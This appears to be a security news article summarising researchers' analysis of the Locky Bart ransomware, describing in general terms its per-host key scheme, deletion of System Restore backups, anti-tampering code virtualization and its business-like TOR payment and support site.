Security researchers have completed an in-depth security analysis of the infamous Locky Bart ransomware strain which has been used to infect thousands of victims worldwide. Continue reading our article to find out more.
An In-depth Look Into The Locky Bart Ransomware
A team of malware researchers have shed some light on one of the famous strains of the Locky family of viruses – the Bart ransomware. The reports came after they researched the last version of it threat which is able to compromise target user data without an active connection to the remote malicious C&C server.
A notable change between the new iteration of the virus and previous samples is that the backend servers appear to be maintained by hosts that are not directly affiliated with the criminal operators of the malware. In previous version we have seen that the Bart ransomware places every affected file in a password protected ZIP archive. The weak algorithm has allowed security researchers to create a decryption tool. Newer versions have followed a new formula:
A unique master encryption key is created for every affected host.
The target user data is enumerated and encrypted.
The used key is encrypted is encrypted using the master key which is associated with the unique ID.
To prevent file recovery the encryption engine also deletes System Restore backups.
There are several important characteristics that sets it apart from some other viruses:
The Locky Bart ransomware gathers information from the infected machine to generate the unique encryption key. It then encrypts the master key using a public-private key pairing method. The private key is stored on the remote C&C remote server.
The ransomware creates a URL on the victim’s machine which contains a TOR link associated with the victim’s ID. When it is visited by the user the remote servers harvests the encrypted unique identification code. By following this procedure the users are actually sending out their private decryption key to the criminals via the network stream.
The Bart Locky ransomware uses code virtualization technology which is an anti-tampering mechanism primarily used as a software protection technique.
The remote C&C server uses its own payment mechanism. If a payment is initiated it is transferred to other wallets. The decryption application is automatically created when the payment has been processed.
According to the security experts the server part of the ransomware is designed to appear and function like a legitimate business. Every victim (also referred to as user or customer) is provided with a support section which is used to initiate contact if they have any concerns.